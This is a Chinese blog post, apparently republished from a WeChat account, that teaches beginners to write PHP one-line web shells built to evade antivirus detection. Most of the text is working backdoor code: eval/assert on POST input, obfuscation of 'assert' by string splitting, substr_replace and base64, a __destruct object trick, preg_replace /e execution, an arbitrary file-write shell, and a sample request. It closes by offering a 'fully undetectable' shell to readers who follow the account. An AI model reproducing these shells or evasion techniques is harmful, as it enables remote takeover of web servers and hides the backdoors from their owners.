php一句话免杀简单学习(附赠自用免杀一句话)
今天我们简单学习一下php的一句话木马的各种方式,通过学习这些我们可以编写出自己的免杀一句话木马。文章最后附赠免杀一句话。这里较为基础,适合新手入门学习。基本的一句话<?phpeval($_POST[ 2023-3-9 00:5:59 Author: 白安全组(查看原文) 阅读量:24 收藏

今天我们简单学习一下php的一句话木马的各种方式,通过学习这些我们可以编写出自己的免杀一句话木马。文章最后附赠免杀一句话。这里较为基础,适合新手入门学习。

基本的一句话

<?phpeval($_POST['haha']);?>

使用assert加载内存

<?phpassert($_POST['haha']);?>

@call_user_func把第一个参数作为回调参数使用

<?php@call_user_func(assert,$_POST['haha']);?>

这里利用substr_replace函数,这个函数啊是那个参数,意思是将第一个字符串,从第四位后面替换成中间的那个值。

<?php$a = substr_replace("assexx","rt",4);$a($_POST['haha']);?>

利用function函数调用变量a,然后下面给fun1中的变量a赋值assert

<?phpfunction fun1($a){    $a($_POST['haha']);}fun1(assert);?>

方式同上,这里是将post赋值给a

<?phpfunction fun1($a){    assert($a);}fun1($_POST['haha']);?>

换行拼接法

$_REQUEST会将值传递过去,下面使用b和a拼接放到eval中,这里的b的值相当于换行执行。

<?php$a = $_REQUEST['haha'];$b = "\n";eval($b.=$a);?>

面向对象法

这里使用面向对象的一种方式设置obj为一个实例对象,然后对象会赋值a一个post

这里使用public匿名生成一个$a,在下面function__destruct中面向对象赋值给a

<?phpclass me{    public $a = '';    function __destruct(){        assert("$this->a");    }}$obj = new me;$obj->a = $_POST['haha'];?>

base64加密法

这里将关键的值使用了base64加密,然后放到里面将解密的值赋值给$a,然后a和后面post拼接执行。

<?php$a = base64_decode("YXNzZXJ0");$a($_POST['haha']);?>

字符分割法

这里将所有的字符分开,然后通过$c结合最后拼接post

<?php$a = "a"."s"."s";$b = "e"."r"."t";$c = $a.$b;$c($_POST['haha']);?>

这里利用一个正则表达式的方式使用@preg_replace函数,该函数里面有三个内容,第一个是搜索模式,第二个是用于替换的字符串,然后是要搜索替换的目标,效果相当于匹配到nihao,将fun的内容拼接到nihao 后面,前面的正则中/e意思是匹配到带入后立即执行。仅适用php7以下

<?phpfunction fun(){    return $_POST['haha'];}@preg_replace("/nihao/e",fun(),"nihao woshi zj");?>

这里属于中介执行,通过读取一个外部传递的文件,然后$d赋值一个data,$$d就相当于成立了一个$data的变量,给他赋值post,下面$f意义同上,相当于我们隐藏建立了一个变量fp给他赋值。fopen函数打开我们传递的文件名文件。

然后下面我们就可以使用fwrite对一个打开的文件$fp进行写入,写入的内容就是我们的另一个隐藏变量$data。后面?是做一个判断,成功返回success,失败返回fail

最后关闭打开的文件$fp

这样我们就可以设置一个文件名写入一个内容。

<?phpif(isset($_POST['file'])){    $d = 'data';    $$d = $_POST['haha'];//$data    $f = 'fp';    $$f = fopen($_POST['file'],'wb');//$fp    echo fwrite($fp,$data)?'save success':'save fail';    fclose($fp);}?>

正则表达式一句话木马

<?php
$a = $_POST['haha'];if(isset($a)){    @preg_replace("/\[(.*)\]/e",'\\1','[@eval(base64_decode($_POST[z0]));]');}
?>

此时\\1为@eval(base64_decode($_POST[z0]));

haha=1&z0=cGhwaW5mbygpOw

这里phpinfo进行一个base64加密传输过去

最后这里我送大家一个我自己写的免杀一句话

是全部免杀的

关注公众号,发送:

我要

获取免杀一句话

扫描二维码关注我们吧!


文章来源: http://mp.weixin.qq.com/s?__biz=MzU4MjYxNTYwNA==&mid=2247486415&idx=1&sn=f01390ee8f2431a3edda8c5528fcdc6d&chksm=fdb4dc94cac355821bacd9abd237776323803aa1f05cfbb8d049e876a3fd3e9ad207e898f5fc#rd
如有侵权请联系:admin#unsafe.sh